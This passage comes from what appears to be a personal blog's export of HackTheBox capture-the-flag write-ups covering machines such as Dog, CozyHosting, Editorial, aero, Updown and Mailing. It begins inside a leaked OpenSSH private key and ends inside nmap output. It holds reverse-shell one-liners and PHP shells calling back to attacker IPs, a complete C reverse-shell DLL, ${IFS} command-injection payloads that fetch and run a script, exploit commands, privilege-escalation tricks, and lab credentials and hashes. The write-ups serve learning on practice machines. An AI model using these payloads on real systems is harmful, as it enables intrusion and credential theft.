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 -----END OPENSSH PRIVATE KEY----- lets use this and ssh as root\njust like that we have our flag\n","date":"20 February 2026","externalUrl":null,"permalink":"/ctf-writeups/builder/","section":"CTF Writeups","summary":"","title":"Builder","type":"ctf-writeups"},{"content":" Dog # Overview # OS: Linux IP: 10.129.5.109 Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: N/A Summary # Got access via exposed creds on git, then used an authenticated rce to get access, switched users and ran binary bee as sudo to get sudo perms.\nLoot # Takeaways Category Details Usernames+Passwords dogBackDropSystem Anonymous tiffany:BackDropJ2024DS2024 jobert:BackDropJ2024DS2024 | | Hashes | $S$E7dig1GTaGJnzgAXAtOoPuaTjJ05fo8fH9USc6vO87T./ffdEr/. $S$E/F9mVPgX4.dGDeDuKxPdXEONCzSvGpjxUeMALZ2IjBrve9Rcoz1 $S$EfD1gJoRtn8I5TlqPTuTfHRBFQWL3x6vC5D3Ew9iU4RECrNuPPdD $S$EYniSfxXt8z3gJ7pfhP5iIncFfCKz8EIkjUD66n/OTdQBFklAji. 
$S$E8OFpwBUqy/xCmMXMqFp3vyz1dJBifxgwNRMKktogL7VVk7yuulS $S$E/DHqfjBWPDLnkOP5auHhHDxF4U.sAJWiODjaumzxQYME6jeo9qV $S$EsV26QVPbF.s0UndNPeNCxYEP/0z2O.2eLUNdKW/xYhg2.lsEcDT $S$EEAGFzd8HSQ/IzwpqI79aJgRvqZnH4JSKLv2C83wUphw0nuoTY8v |\nEnumeration # nmap HUGE\ndirb sub 80 hmm so when we used this cred we were getting unknown pass\nlet me have hydra running in the background doing this\nnow lets check\n/core\n/README.md\nwith this i can tell that it is backdrop version 1.22.0 maybe\nfound this RCE path, but need admin privs\nhttps://grimthereaperteam.medium.com/backdrop-cms-1-22-0-unrestricted-file-upload-layouts-ce49a6b7e521 kali ( found out it is actually 1.27.1 instead by looking at the testing folder lol )\ni think the robotstxt was a loophole, so im gonna check the git repo now\nlet me dump it\nlooking at the settings we find this\nwe also find the user tiffany\nExploitation # i had to use a writeup to find out how to locate tiffany, but lets try using hydra nd brutefrorcing the username w the pass we found\nBackDropJ2024DS2024\nlets move on w tiffany fr now\nlets follow this cve for RCE now\nBackdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)\nwasnt working so we tried this github one instead\nhttps://github.com/rvizx/backdrop-rce/blob/main/README.md\nthere is an ssh folder in jobert, lets take that\ndamn we cant take it we gotta find another way\nso there is apparently mysql open on this\nlets access it after pivoting\nboom we have access with the root creds\napparerently, this is not the intended path and cracking the hashes will take too much time\ninstead we can ssh with jobert as the user and the same pass from before\nnow we can apparently run bee as sudo so lets check it out\nsudo /usr/local/bin/bee eval ‘system(”bash”);’\n","date":"20 February 2026","externalUrl":null,"permalink":"/ctf-writeups/dog/","section":"CTF Writeups","summary":"","title":"Dog","type":"ctf-writeups"},{"content":" CozyHosting # Overview # OS: Linux IP: 10.129.229.88 
Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: N/A Summary # found exposed endpoint that gave us a session, used session and got in with RCE that bypassed whitespacefiltering, found jar file with archive containing db creds, used db creds to find hashes, cracked hash for ssh cred, found sudo -l lets us run binary shsh with root, elevarted with proxychain command.\nLoot # Takeaways Category Details Usernames+Passwords info@cozyhosting.htb postgres:Vg\u0026amp;nvzAQ7XxR josh@cozyhosting.htb | | Hashes | kanderson $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim\nadmin $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | | Sessions | kanderson:B1FB7155CC956000B44F256C81194FAA |\nEnumeration # nmap dirb sub nothing interestin w wfuzz\n80 South Jakarta City 12120, Jakarta, Indonesia Phone: +62 5589 55488 55\nEmail: info@cozyhosting.htb\n/admin\nbecause of this whitelabel thing we identified that the framework being using is springboot, lets fuzz for more endpoints\nExploitation # On visiting this exposed endpoint we find this user kandersons session\nkanderson\nB1FB7155CC956000B44F256C81194FAA\nlets edit our browsers cookies\nwe should be able to access now\nthere is this place where we can use ssh\nsince my connection keeps breaking ill refer to 0xdfs blog\nLets host our revshell locally\n#!/bin/bash bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.6/443 0\u0026gt;\u0026amp;1 now lets use user as localhost\nand username as\nmuqf%3bcurl${IFS}http: // 10 . 10 . 14 . 41/ rev . 
sh${IFS}-o${IFS}/tmp/rev.sh now lets send another request to run it\nmuq%3bbash${IFS}/tmp/rev.sh and Boom we have a shell\nfound this in the jar file located withing /app directory because i noticed earlier in the env dir it was referencing to this\nwe have the creds for postgres and we know that it is running on this port\nlets portforward the port 5432 and access the postgresDB\nwe see these two tables in the cozyhosting db\nlets try a different mode\nand the password for admin is\nmanchesterunited\nwe find that when we ssh w user as john it works so lets pop a shell\ndamn so we can run the ssh binary?\ngtfo bins gives us this proxy thing that instantly drops root\n","date":"19 February 2026","externalUrl":null,"permalink":"/ctf-writeups/cozyhosting/","section":"CTF Writeups","summary":"","title":"CozyHosting","type":"ctf-writeups"},{"content":" Pandora # Overview # OS: Linux Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: N/A Summary # snmpwalk for creds, escalated with hidden site and known explot.\nLoot # Takeaways Category Details Usernames+Passwords daniel:HotelBabylon23 Hashes Enumeration # nmap 80 161 Exploitation # we ssh into the server with these creds as daniel, lets try privesc with linpeas and see if there is anything interesting.\ninteresting we can try this\nnevermind it says starting from 1.9.14 so we can move on\nthere seems to be no file so this cant be it either\nlets check our linepas result again\ninteresting, mysql is running?\nmysql is definetely running\nhmm lets check the pandora.conf file out\nthere seems to be somethign running locally?\nlets check the sites conf file if there is anything we missed\nthere is a site that is being hosted locally with the name pandora.panda.htb and its under matt, this is interesting lets add it to our hosts file and do some port forwarding\non portforwarding the traffic we get this\nBOOM now lets enumerate\non searching this version number we get this\nAuthenticated RCE\nPandora FMS v7.0NG.742 - 
Remote Code Execution (RCE) (Authenticated)\nthere is also this\nblog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained\nused a aunauthenticated sql exploit to get access as matt\nPandora_v7.0NG.742_exploit_unauthenticated/sqlpwn.py at master · shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated\nReading the config file gives us those credentials\nfound a MD5 hash on one of the tables, for matt\nlets crack it aand it doesnt work\nwait why do even have to do that in the first place, we can just use the cmdline we got from earlier to execute with python3 a revshell\nannnd we have our shell as matt\nwe know that tar is being invoke w root, so lets modify it nd use our tar as the path to it is not absolute\nmatt@pandora:/tmp$ touch tar matt@pandora:/tmp$ echo \u0026#34;/bin/sh\u0026#34; \u0026gt; tar matt@pandora:/tmp$ chmod +x tar matt@pandora:/tmp$ PATH=/tmp:$PATH matt@pandora:/tmp$ pandora_backup PandoraFMS Backup Utility Now attempting to backup PandoraFMS client $ whoami matt this doesn’t work, i gave up nw and looked at 0xdfs writeup who explained why this didnt work, apparently it works if we ssh as matt and run it again so lets try that\n","date":"9 February 2026","externalUrl":null,"permalink":"/ctf-writeups/pandora/","section":"CTF Writeups","summary":"","title":"Pandora","type":"ctf-writeups"},{"content":" Editorial # Overview # OS: Linux IP: 10.129.3.78 Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: N/A Summary # Found site that acceps url parameter, fuzzed it for SSRF on http://localhost, found file at port 5000, enumerated api end points at port 5000 to find the creds for inital access, elevatred priv by identifying a vulnerable python git package in code that prod could run, also learnt how to enumerate .git.\nLoot # Takeaways Category Details Usernames+Passwords Username: dev Password: dev080217_devAPI!@\ndev-carlos.valderamma | | Hashes | |\nEnumeration # nmap 80\ndirbusting\nExploitation # we notice that on visiting the 
site we have a book upload option where on clciking preview we are returned with the directory of the place the image is being saved in\nCould not find anything so lets start enumerating for any other port that might be open on the local host\nLets automate this process with burpsuite intruder\nburpsuite was very slow so what we did instead was we used FFUF to perform the scan and found port 5000 having a different size, on visiting that port we were able to grab a file that had this as it content.\nnow on querying all these endpoints\nwe got these credentials\nnow that we r in using ssh, we come across this git repo\nthere is a file here called app.py\nlets visit this app.py\nnothin much over here\ndev@editorial:/opt/apps/app_editorial$ls app.py editorial.sock __pycache__ static templates venv wsgi.py when checking the logs we come across this which is pretty interesting\ndowngrading prod do dev?\nlets look a bit more deeper\nand boom we have credentials for prod\nwe are able to run this script as root\nok so we can see that the script is pulling from the git library, lets check if that has any vulns\nhttps://security.snyk.io/vuln/SNYK-PYTHON-GITPYTHON-3113858\nwe find this RCE we can use\nlets run the python script with this\n“exit::sh -c bash% -c% ‘bash% -i % \u0026gt;\u0026amp;% /dev/tcp/10.10.14.54/7823% 0\u0026gt;\u0026amp;1”\nlets store the script instead and run it since doing it directly doesnt work\nsudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py \u0026rsquo;ext::sh -c bash% /tmp/shell.sh’\nand that gives us our root flag\n0a68777caa922bdfb77f7d148663cced\n","date":"28 January 2026","externalUrl":null,"permalink":"/ctf-writeups/editorial/","section":"CTF Writeups","summary":"","title":"Editorial","type":"ctf-writeups"},{"content":" aero # Overview # OS: Windows IP: 10.129.1.73 Difficulty: Medium Platform: HackTheBox OSCP: Yes Lists: N/A Summary # Got initial access using a exploit.theme file, elevated privs with buffer overflow 
privesc vuln.\nLoot # Takeaways Category Details Usernames+Passwords Hashes Enumeration # nmap 80 Place where we can upload a .theme file\nExploitation # Knowing that we are able to upload theme files lets check if there is any vulnerability that works with this\nthis looks interesting, lets try it out\nLets use visual studio to craft our rev shell in C\nLets add a new header file in the solution explorer, named rev.h\n`#pragma once\nextern \u0026ldquo;C\u0026rdquo; __declspec(dllexport) int VerifyThemeVersion(void);`\nlets add rev.cpp aswell\n#include \u0026#34;pch.h\u0026#34; #include \u0026lt;stdio.h\u0026gt; #include \u0026lt;string.h\u0026gt; #include \u0026lt;process.h\u0026gt; #include \u0026lt;winsock2.h\u0026gt; #include \u0026lt;ws2tcpip.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; #pragma comment(lib, \u0026#34;Ws2_32.lib\u0026#34;) #include \u0026#34;rev.h\u0026#34; using namespace std; void rev_shell() { FreeConsole(); const char* REMOTE_ADDR = \u0026#34;127.0.0.1\u0026#34;; const char* REMOTE_PORT = \u0026#34;4444\u0026#34;; WSADATA wsaData; int iResult = WSAStartup(MAKEWORD(2, 2), \u0026amp;wsaData); struct addrinfo* result = NULL, * ptr = NULL, hints; memset(\u0026amp;hints, 0, sizeof(hints)); hints.ai_family = AF_UNSPEC; hints.ai_socktype = SOCK_STREAM; hints.ai_protocol = IPPROTO_TCP; getaddrinfo(REMOTE_ADDR, REMOTE_PORT, \u0026amp;hints, \u0026amp;result); ptr = result; SOCKET ConnectSocket = WSASocket(ptr-\u0026gt;ai_family, ptr-\u0026gt;ai_socktype, ptr-\u0026gt;ai_protocol, NULL, NULL, NULL); connect(ConnectSocket, ptr-\u0026gt;ai_addr, (int)ptr-\u0026gt;ai_addrlen); STARTUPINFO si; PROCESS_INFORMATION pi; ZeroMemory(\u0026amp;si, sizeof(si)); si.cb = sizeof(si); ZeroMemory(\u0026amp;pi, sizeof(pi)); si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; si.wShowWindow = SW_HIDE; si.hStdInput = (HANDLE)ConnectSocket; si.hStdOutput = (HANDLE)ConnectSocket; si.hStdError = (HANDLE)ConnectSocket; TCHAR cmd[] = 
TEXT(\u0026#34;C:\\\\WINDOWS\\\\SYSTEM32\\\\CMD.EXE\u0026#34;); CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, \u0026amp;si, \u0026amp;pi); WaitForSingleObject(pi.hProcess, INFINITE); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); WSACleanup(); } int VerifyThemeVersion(void) { rev_shell(); return 0; now lets set it to release and go build and then build wsolution\nafter copying it over to stage 3 we will generate over theme file\n.\\ThemeBleed.exe make_theme 10.10.14.6 exploit.theme\nOk so scratch all that, despite trying several times i wasnt able to run the exploit, maybe because it is meant for windows, so lets try this guys instead.\nhttps://github.com/Jnnshschl/CVE-2023-38146\nand we get our rev shell on the listener so easily with this\nwe find some cve pdf lets use this to encode and decode it\n[convert]::ToBase64String((Get-Content -path \u0026ldquo;filename\u0026rdquo; -Encoding byte))\n[System.IO.File]::WriteAllBytes(\u0026ldquo;C:\\Users..\\Desktop\\abcd.pdf\u0026rdquo; , [System.Convert]::FromBase64String(\u0026ldquo;Base64 encoded string\u0026rdquo;))\nFound a precompiled binary of this exploit online, generated revshell.exe w msfvenom and then just ran it to get the rev shell\n","date":"26 January 2026","externalUrl":null,"permalink":"/ctf-writeups/aero/","section":"CTF Writeups","summary":"","title":"aero","type":"ctf-writeups"},{"content":" Updown # Overview # OS: Linux IP: 10.129.37.232 Difficulty: Medium Platform: HackTheBox OSCP: Yes Lists: N/A Summary # Got access via discovered subdomain which we accessed by modifying a header and then we uploaded a phar file access phar file content to get our rev shell, esclated priv by python2 input func rce which gave us access to developer, grabbed rsa key ssh in and ppriv esc again by using a script from gtfo bin for easy install that we had sudo perms to.\nLoot # Takeaways Username +Passwords Enumeration # nmap 80 Homepage on 80\nDebug just gives us the pages source code hmmm\n/dev shows 
nothing\nWe find this subdomain called dev\nusing gobuster on dev we get these\ngobuster dir -u http://siteisup.htb/dev -w /usr/share/wordlists/dirb/common.txt\nVulnerabilities # Exploitation # we find that we can access the dev subdomain with a special header by klooking at .htaccess which we got from dumping git with gitdumper ( dev/.git/ ) so lets check it out\nfunc blacklist\n\u0026lt;?php $descriptorspec = [ 0 =\u0026gt; [\u0026#34;pipe\u0026#34;, \u0026#34;r\u0026#34;], // STDIN 1 =\u0026gt; [\u0026#34;pipe\u0026#34;, \u0026#34;w\u0026#34;], // STDOUT 2 =\u0026gt; [\u0026#34;pipe\u0026#34;, \u0026#34;w\u0026#34;], // STDERR ]; $command = \u0026#34;/bin/bash -c \u0026#39;bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.15/1234 0\u0026gt;\u0026amp;1\u0026#39;\u0026#34;; $process = proc_open($command, $descriptorspec, $pipes); if (is_resource($process)) { fclose($pipes[0]); // Close STDIN fclose($pipes[1]); // Close STDOUT fclose($pipes[2]); // Close STDERR proc_close($process); } ?\u0026gt; php rev shell without fsockopen() and exec() )\n\u0026lt;?php $descspec = array( 0 =\u0026gt; array(\u0026#34;pipe\u0026#34;, \u0026#34;r\u0026#34;), 1 =\u0026gt; array(\u0026#34;pipe\u0026#34;, \u0026#34;w\u0026#34;), 2 =\u0026gt; array(\u0026#34;pipe\u0026#34;, \u0026#34;w\u0026#34;) ); $cmd = \u0026#34;/bin/bash -c \u0026#39;/bin/bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.6/443 0\u0026gt;\u0026amp;1\u0026#39;\u0026#34;; $proc = proc_open($cmd, $descspec, $pipes); ?\u0026gt; after uploading this we access the lnk nd use the phar file like this\nhttp://dev.siteisup.htb/?page=phar://uploads/92d9d308ef1ac5fca2cef03d095afd9b/attempt.rob/attempt we are going to escalate liket his }\nbad writeup but anyways gonna escalate with python2 input rce\n__import__(\u0026#39;os\u0026#39;).system(\u0026#39;bash\u0026#39;) Lets add ssh and grab our rsa key\ncd into ssh\nvi developer.id_rsa and copy it there in our home user\ngive it perms with chmod 600\nssh -i developer.id_rsa 
developer@siteisup.htb\nwe can run easy_install with sudo when we check with sudo-l\nlets check gtfo bins to check if there is anything with sudo\n","date":"14 January 2026","externalUrl":null,"permalink":"/ctf-writeups/updown/","section":"CTF Writeups","summary":"","title":"Updown","type":"ctf-writeups"},{"content":" keeper # Overview # OS: Linux IP: 10.129.229.41 Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: N/A Summary # Accessed request tracker software with default creds , found credws in one of the queues for ssh access, ssh as user and found a keypass memory dump file, used script to get masterkey fromt he memory dump which later gave us root access when investigating using kpcli.\nLoot # Takeaways Usernames root/password Inorgaard@keeper.htb/Welcome2023! | Inorgaard Helpdesk Agent webmaster@keeper.htb rt@keeper.htb Lise | | Subdomains | tickets.keeper.htb | | | | | rødgrød med fløde |\nEnumeration # nmap scan result 80 Lets visit the subdomain we found and perform dirbusting on it\napparently its using a softwarer called request tracker lets see what it does w chatgpt\nhmmm. so its like a place like github where everythign is organized in requests, and i can see that we can request for admin? 
like give me admin access thats interesting\n»|« RT 4.4.4+dfsg-2ubuntu1 (Debian) Copyright 1996-2019 Best Practical Solutions, LLC.\napparently its version 4.4.4 aswell\nwe got access using default creds root/password\nin one of the js files we found with dirbusting we find this\nExploitation # ok so on clicking download on this test ticket we are able to view it\nhmm, on editing the user we also see this\nand with those creds we can ssh and grab the user flag\nnow lets esc priv\nlets get the keypass dumper\ngit clone https://github.com/vdohney/keepass-password-dumper\nwe get this as the password which we can now use as the master key rødgrød med fløde\nkpcli --kdb passcodes.kdb\nwe find the putty which we convert into an ssh key using puttygen\n","date":"8 January 2026","externalUrl":null,"permalink":"/ctf-writeups/keeper/","section":"CTF Writeups","summary":"","title":"keeper","type":"ctf-writeups"},{"content":" Mailing # Overview # OS: Windows IP: 10.129.24.210 Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: N/A Summary # path traversal led to file disclosure that led us to a config file which we got creds from to access the mail server.\nLoot # Takeaways Usernames IT Ruy Alonso Support Maya Bendito maya@mailing.htb CEO Gregory Smith Username+pass AdministratorPassword= 841bb5acfa6779ae432fd7a4e6600ba7 homenetworkingadministrator Mysql 0a9f8ad8bf896b501dde74f08efd7e4c maya m4y4ngs4ri using a cve we senmt a mail that gave us a hash passed the hash to get rce and privesc with libreoffice vulnerability\nEnumeration # nmap scan Port 80 # By testing out a directory from\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/Intruder/dotdotpwn.txt\nwe are able to identify LFI because it returned us the .ini file\nVulnerabilities # Exploitation # We will use the LFI we found earlier to read the .ini file for hmailserver and see if we can find something interesting\nlets check 
../../../../Progra~2\\hMailServer\\Bin\\MailServer.ini\nboom we have the config file\n[Directories] ProgramFolder=C:\\Program Files (x86)\\hMailServer DatabaseFolder=C:\\Program Files (x86)\\hMailServer\\Database DataFolder=C:\\Program Files (x86)\\hMailServer\\Data LogFolder=C:\\Program Files (x86)\\hMailServer\\Logs TempFolder=C:\\Program Files (x86)\\hMailServer\\Temp EventFolder=C:\\Program Files (x86)\\hMailServer\\Events [GUILanguages] ValidLanguages=english,swedish [Security] AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7 [Database] Type=MSSQLCE Username= Password=0a9f8ad8bf896b501dde74f08efd7e4c PasswordEncryption=1 Port=0 Server= Database=hMailServer Internal=1 lets check the creds we got with swaks\nswaks --auth-user 'administrator@mailing.htb' --auth LOGIN --auth-password homenetworkingadministrator --quit-after AUTH --server mailing.htb\ngreat it shows that the creds are valid.\nhmm lets look at any CVE for windows mail\ngit clone https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability\npython3 CVE-2024-21413.py \u0026ndash;server mailing.htb \u0026ndash;port 587 \u0026ndash;username administrator@mailing.htb \u0026ndash;password homenetworkingadministrator \u0026ndash;sender administrator@mailing.htb \u0026ndash;recipient maya@mailing.htb \u0026ndash;url \u0026ldquo;\\10.10.14.28\\share\\sploit\u0026rdquo; \u0026ndash;subject \u0026ldquo;Check it\u0026rdquo;\nlets run responder to capture it\nsudo responder -I tun0\nthere we captured the hash\nlets crack it with hashcat\nboom we got creds as m4yr4ngsri\nlets try to connect with winrm\nAfter finding a old version of libre office under programs, being used we can start Exploiting libre using this CVE\npython /opt/CVE-2023-2255/CVE-2023-2255.py --cmd 'cmd.exe /c C:\\ProgramData\\nc64.exe -e cmd.exe 10.10.14.6 443' --output exploit.odt\nlets upload the doc to smb share\nsmbclient \u0026lsquo;//10.10.11.14/important documents\u0026rsquo; \u0026ndash;user maya 
\u0026ndash;password m4y4ngs4ri\n","date":"7 January 2026","externalUrl":null,"permalink":"/ctf-writeups/mailing/","section":"CTF Writeups","summary":"","title":"Mailing","type":"ctf-writeups"},{"content":" Soccer # Overview # OS: Linux IP: 10.129.18.173 Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: N/A Summary # got shell found exposed site under nginx, found sqli boolean based, used sql map got table with creds, winrm with creds and privesc with doas suid enabled.\nLoot # Credentials TinyFile :- admin/admin@123 Takeaways\nEnumeration # nmap -sCV -A --min-rate 1000 10.129.18.173 Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-30 11:38 EST Nmap scan report for 10.129.18.173 Host is up (0.18s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 ad:0d:84:a3:fd:cc:98:a4:78:fe:f9:49:15:da:e1:6d (RSA) | 256 df:d6:a3:9f:68:26:9d:fc:7c:6a:0c:29:e9:61:f0:0c (ECDSA) |_ 256 57:97:56:5d:ef:79:3c:2f:cb:db:35:ff:f1:7c:61:5c (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://soccer.htb/ 9091/tcp open xmltec-xmlmail? 
| fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, SSLSessionReq, drda, informix: | HTTP/1.1 400 Bad Request | Connection: close | GetRequest: | HTTP/1.1 404 Not Found | Content-Security-Policy: default-src \u0026#39;none\u0026#39; | X-Content-Type-Options: nosniff | Content-Type: text/html; charset=utf-8 | Content-Length: 139 | Date: Tue, 30 Dec 2025 16:39:07 GMT | Connection: close | \u0026lt;!DOCTYPE html\u0026gt; | \u0026lt;html lang=\u0026#34;en\u0026#34;\u0026gt; | \u0026lt;head\u0026gt; | \u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt; | \u0026lt;title\u0026gt;Error\u0026lt;/title\u0026gt; | \u0026lt;/head\u0026gt; | \u0026lt;body\u0026gt; | \u0026lt;pre\u0026gt;Cannot GET /\u0026lt;/pre\u0026gt; | \u0026lt;/body\u0026gt; | \u0026lt;/html\u0026gt; | HTTPOptions, RTSPRequest: | HTTP/1.1 404 Not Found | Content-Security-Policy: default-src \u0026#39;none\u0026#39; | X-Content-Type-Options: nosniff | Content-Type: text/html; charset=utf-8 | Content-Length: 143 | Date: Tue, 30 Dec 2025 16:39:08 GMT | Connection: close | \u0026lt;!DOCTYPE html\u0026gt; | \u0026lt;html lang=\u0026#34;en\u0026#34;\u0026gt; | \u0026lt;head\u0026gt; | \u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt; | \u0026lt;title\u0026gt;Error\u0026lt;/title\u0026gt; | \u0026lt;/head\u0026gt; | \u0026lt;body\u0026gt; | \u0026lt;pre\u0026gt;Cannot OPTIONS /\u0026lt;/pre\u0026gt; | \u0026lt;/body\u0026gt; |_ \u0026lt;/html\u0026gt; 1 service unrecognized despite returning data. 
If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port9091-TCP:V=7.95%I=7%D=12/30%Time=69540027%P=x86_64-pc-linux-gnu%r(i SF:nformix,2F,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nConnection:\\x20close\\ SF:r\\n\\r\\n\u0026#34;)%r(drda,2F,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nConnection:\\ SF:x20close\\r\\n\\r\\n\u0026#34;)%r(GetRequest,168,\u0026#34;HTTP/1\\.1\\x20404\\x20Not\\x20Found\\r SF:\\nContent-Security-Policy:\\x20default-src\\x20\u0026#39;none\u0026#39;\\r\\nX-Content-Type-O SF:ptions:\\x20nosniff\\r\\nContent-Type:\\x20text/html;\\x20charset=utf-8\\r\\nC SF:ontent-Length:\\x20139\\r\\nDate:\\x20Tue,\\x2030\\x20Dec\\x202025\\x2016:39:07 SF:\\x20GMT\\r\\nConnection:\\x20close\\r\\n\\r\\n\u0026lt;!DOCTYPE\\x20html\u0026gt;\\n\u0026lt;html\\x20lan SF:g=\\\u0026#34;en\\\u0026#34;\u0026gt;\\n\u0026lt;head\u0026gt;\\n\u0026lt;meta\\x20charset=\\\u0026#34;utf-8\\\u0026#34;\u0026gt;\\n\u0026lt;title\u0026gt;Error\u0026lt;/title\u0026gt;\\n\u0026lt; SF:/head\u0026gt;\\n\u0026lt;body\u0026gt;\\n\u0026lt;pre\u0026gt;Cannot\\x20GET\\x20/\u0026lt;/pre\u0026gt;\\n\u0026lt;/body\u0026gt;\\n\u0026lt;/html\u0026gt;\\n\u0026#34;)%r(H SF:TTPOptions,16C,\u0026#34;HTTP/1\\.1\\x20404\\x20Not\\x20Found\\r\\nContent-Security-Po SF:licy:\\x20default-src\\x20\u0026#39;none\u0026#39;\\r\\nX-Content-Type-Options:\\x20nosniff\\r\\ SF:nContent-Type:\\x20text/html;\\x20charset=utf-8\\r\\nContent-Length:\\x20143 SF:\\r\\nDate:\\x20Tue,\\x2030\\x20Dec\\x202025\\x2016:39:08\\x20GMT\\r\\nConnection SF::\\x20close\\r\\n\\r\\n\u0026lt;!DOCTYPE\\x20html\u0026gt;\\n\u0026lt;html\\x20lang=\\\u0026#34;en\\\u0026#34;\u0026gt;\\n\u0026lt;head\u0026gt;\\n\u0026lt;m SF:eta\\x20charset=\\\u0026#34;utf-8\\\u0026#34;\u0026gt;\\n\u0026lt;title\u0026gt;Error\u0026lt;/title\u0026gt;\\n\u0026lt;/head\u0026gt;\\n\u0026lt;body\u0026gt;\\n\u0026lt;pre\u0026gt; 
